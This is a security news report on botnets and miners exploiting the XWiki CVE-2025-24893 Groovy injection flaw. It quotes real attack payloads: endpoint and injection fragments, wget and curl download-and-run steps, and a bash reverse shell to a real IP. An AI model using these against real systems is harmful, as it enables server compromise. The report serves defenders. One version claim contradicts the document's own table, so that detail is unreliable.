Cybersecurity researchers have observed a surge in attacks targeting CVE-2025-24893, a critical remote code execution flaw in the XWiki platform.
This vulnerability allows unauthenticated attackers to inject and execute arbitrary Groovy code via the SolrSearch macro, enabling full server compromise.
Since its addition to CISA’s Known Exploited Vulnerabilities catalog on October 30, 2025, exploitation has expanded rapidly, with botnets like RondoDox now using it to recruit servers for malicious operations.
Early detection tools, such as VulnCheck Canaries, have captured these attempts, revealing diverse threat actors ranging from coin miners to custom scanners.
Defenders must prioritize patching to prevent widespread botnet growth.
| CVE ID | Description | CVSS Score | Affected Versions | Exploitation Status |
| CVE-2025-24893 | Unauthenticated remote code execution via SolrSearch macro allowing arbitrary Groovy code injection in XWiki Platform. | 9.8 (Critical) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | XWiki 5.3-milestone-2 to 15.10.10; 16.0.0-rc-1 to 16.4.0. Fixed in 15.10.11, 16.4.1, 16.5.0RC1. | Actively exploited in the wild since October 2025 by botnets like RondoDox for server recruitment. |
| CVE-2023-47218 | OS command injection vulnerability in QNAP operating systems allowing unauthenticated command execution over the network. | 5.8 (Medium) CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L | QTS before 5.1.5.2645 build 20240116; QuTS hero before h5.1.5.2647; QuTScloud before c5.1.5.2651. |
Increased Exploitation Activity
Exploitation of CVE-2025-24893 began in late October 2025, with VulnCheck Canaries detecting initial attacks on internet-exposed XWiki servers.
The flaw affects versions 15.10.11, 16.4.1, and 16.5.0RC1, in which attackers craft HTTP GET requests to the “/xwiki/bin/get/Main/SolrSearch” endpoint.
These requests embed Groovy code in the “text” parameter, bypassing authentication by closing Velocity template tags with “%7D%7D” and injecting payloads like “{{async async=false}}{{groovy}}”.
For instance, a typical exploit payload decodes to commands that download secondary scripts via wget or curl.
Activity spiked after November 3, 2025, when RondoDox integrated the vulnerability into its arsenal. RondoDox, a botnet first documented in July 2025, now targets over 650 exploits across devices.
Its attacks use a distinctive User-Agent, “Mozilla/5.0 (bang2013@atomicmail.io)”, and payloads such as “rondo.sdu.sh,” hosted on IPs including 74.194.191.52.
A captured request from IP 45.153.34.156 shows base64-encoded Groovy code executing “wget -qO | sh”, pulling a downloader that installs the botnet for DDoS or cryptomining. This two-stage chain writes files to disk before execution, evading basic detection.
Other actors include coin miners deploying payloads from obfuscated URLs.
On November 7, 2025, IP 172.245.241.123 fetched a base64-encoded script from ospwrf10ny.anondns.net, which was decoded into a bash function that curls additional miners with the hash 03a77a556f074184b254d90e13cdd3a31efaa5a77640405e5f78aa462736acf7.
Another attack from 156.146.56.131 used python-requests to curl “setup_runnv_miner.sh” from 47.236.194.231:81, saving it as /tmp/123.sh for later execution.
These miners consume server resources, turning compromised XWiki instances into cryptojacking nodes.
Reverse shell attempts further highlight targeted threats. On October 31, 2025, AWS IP 18.228.3.224 tried a BusyBox nc reverse shell to itself on port 8443, suggesting manual reconnaissance.
Later, on November 11, 118.99.141.178, a potentially exploited QNAP host vulnerable to CVE-2023-47218, attempted a bash reverse shell to 155.138.212.170:9001 using “/bin/bash -i >& /dev/tcp/155.138.212.170/9001 0>&1”.
The QNAP flaw enables command injection, amplifying risks when chained with XWiki exploits.
Botnet Recruitment Tactics
RondoDox’s recruitment via CVE-2025-24893 exemplifies botnet evolution, with steady growth since November 3.
The botnet’s downloader fetches modular payloads, enabling DDoS amplification or proxying.
VulnCheck data from October 28 to November 11 shows over 100 unique exploit signatures, including OAST probes.
Fun and Nuclei scans dumping /etc/passwd via “cat /etc/passwd”. Non-standard probes like “id” or “EXPLOIT_SUCCESS” indicate custom tooling.
An actor from the initial exploitation report expanded to new IPs, including 172.206.196.45, and to hosts at 185.142.33.151, downloading x86-64 binaries to /tmp/f1c5f.
This diversity from automated botnets to hands-on attacks underscores the vulnerability’s appeal for initial access. XWiki, used for enterprise wikis, often runs on exposed ports, amplifying risk.
Patching remains critical, as exploitation precedes broad awareness. Tools like VulnCheck’s Canary Intelligence offer early visibility, blocking attacks before compromise.
Organizations should scan for exposed XWiki instances and monitor for Groovy injections in logs.
